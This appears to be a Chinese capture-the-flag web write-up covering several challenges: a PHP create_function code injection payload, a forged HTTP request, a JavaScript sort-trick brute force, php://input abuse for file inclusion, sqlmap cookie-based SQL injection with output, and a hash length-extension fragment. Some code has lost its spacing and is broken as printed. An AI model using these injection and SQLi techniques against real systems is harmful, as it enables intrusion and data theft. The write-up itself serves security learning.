create_function(args, code) // The function arguments. The function code. $j6() => function(args){ code }
此题只需将 }phpinfo();/* 进行 base64 编码,再传进去就 OK 了
抓包和改包
满足以下全部条件就能获得 flag
将 HTTP 请求方式修改为 POST
添加 HTTP 请求头“X-Give-Me-Flag”,值为 1
将包含浏览器标识的 HTTP 请求头的值修改为“Flag Browser 1.0”
将 Cookie 中“auth”的值修改为 117.29.42.247
POST 键名为“action”,值为“readflag”的数据
这题比较简单,直接用 Burp 改一下就 OK 了
POST / HTTP/1.1 Host: http01.web.raccoon.ml:8080 User-Agent: Flag Browser 1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: auth=117.29.42.247 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 X-Give-Me-Flag: 1 Content-Length: 15 Content-Type: application/x-www-form-urlencoded
action=readflag
Javascript Tricks
nc 45.32.250.222 8082
var net = require('net');
flag='fake_flag';
var server = net.createServer( function(socket) { socket.on('data', (data) => { //m = data.toString().replace(/[\n\r]*$/, ''); ok = true; arr = data.toString().split(' '); // 空格作为分隔,创建数组 arr = arr.map(Number);// 全部转为数字 if (arr.length != 5) // arr长度为5 ok = false; arr1 = arr.slice(0); // 抽取从0开始的所有字符(就是复制arr给arr1) arr1.sort(); // js sort比较特殊 10,5,40,25,1000,1 -> 1,10,1000,25,40,5 for (var i=0; i<4; i++) // 前后元素不能相同 if (arr1[i+1] == arr1[i] || arr[i] < 0 || arr1[i+1] > 127) ok = false; arr2 = [] for (var i=0; i<4; i++) arr2.push(arr1[i] + arr1[i+1]); val = 0; for (var i=0; i<4; i++) val = val * 0x100 + arr2[i]; // 0x100 = 256 if (val != 0x23332333) // 590553907 ok = false; if (ok) socket.write(flag+'\n'); else socket.write('nope\n'); }); //socket.write('Echo server\r\n'); //socket.pipe(socket); } );
HOST = '0.0.0.0' PORT = 8082
server.listen(PORT, HOST);
初步思路:把 data 暴力跑出来,再 nc 提交一下
defcheck(a,b,c,d): arr = [a,b,c,d] val = 0 for i in range(4): val = val * 256 + arr[i] if val == 590553907: # 也可以不转十进制 returnTrue
N = 60 for i in range(N): for j in range(N): for k in range(N): for l in range(N): if check(i,j,k,l): print(i,j,k,l)
# arr2 = [35 51 35 51]
N = 51 for i in range(N): for j in range(N): for k in range(N): for l in range(N): for m in range(N): if i+j == 35and j+k == 52and k+l == 35and l+m == 51: print(i,j,k,l,m)
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; include($file); //class.php }else{ echo "you are not admin ! "; }
这里涉及到一个 PHP伪协议,php://input,可读取没有处理过的 POST 数据。详细讲解大佬讲解
http://120.78.187.100:8081/?user=php://input # 再 post 一个 "the user is admin" # 此时可以发现界面变成了 "hello admin!" http://120.78.187.100:8081/?user=php://input&file=class.php
# 1.cookie 注入,猜解表 sqlmap -u http://120.78.187.100:8082/content.php --cookie "message_id=1412" --table --level 2 #do you want to URL encode cookie values (implementation specific)? [Y/n] Y [10:42:28] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 9.0 (stretch) web application technology: PHP 5.6.38, Apache 2.4.25 back-end DBMS: MySQL >= 5.0.12 Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y #do you want to use common table existence check? [Y/n/q] Y 10 # 表已经跑出来了 Database: 2018_hdb_waf [3 tables] +---------------------------------------+ | user | | content | | flag | +---------------------------------------+
# 2.选择表猜解字段(flag) sqlmap -u http://120.78.187.100:8082/content.php --cookie "message_id=1412" --column -T flag --level 2 Table: flag [1 column] +--------+--------------+ | Column | Type | +--------+--------------+ | flag | varchar(255) | +--------+--------------+
for i in range(500): signature = '579e444c268e0d907802313318cdfcb2' original = 'order_id=160&buyer_id=39&good_id=25&buyer_point=500&good_price=10&order_create_time=1542226400.115264' add_data = '&a=233' key_length = len(original) + 700 + i
评论